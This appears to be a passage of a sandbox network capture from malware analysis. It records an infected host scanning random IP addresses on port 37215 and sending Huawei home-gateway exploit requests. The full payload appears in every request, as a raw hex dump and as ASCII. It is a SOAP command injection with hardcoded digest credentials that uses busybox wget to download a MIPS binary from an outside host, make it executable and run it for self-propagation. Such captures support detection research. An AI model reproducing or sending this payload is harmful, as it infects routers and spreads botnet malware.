                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          447192.168.2.2335400157.197.55.9237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.187907934 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          448192.168.2.2355742197.20.73.19537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.187907934 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          449192.168.2.2333052157.237.174.437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.187963009 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          450192.168.2.2345276197.183.161.20537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.188061953 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          451192.168.2.2348670157.210.25.16937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.188071012 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          452192.168.2.2350476184.84.57.9037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.188080072 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          453192.168.2.234010041.177.73.12537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.188083887 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          454192.168.2.2358592157.127.96.15637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.188105106 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          455192.168.2.235193042.157.120.23337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.188117027 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          456192.168.2.234035041.42.18.21337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.188118935 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
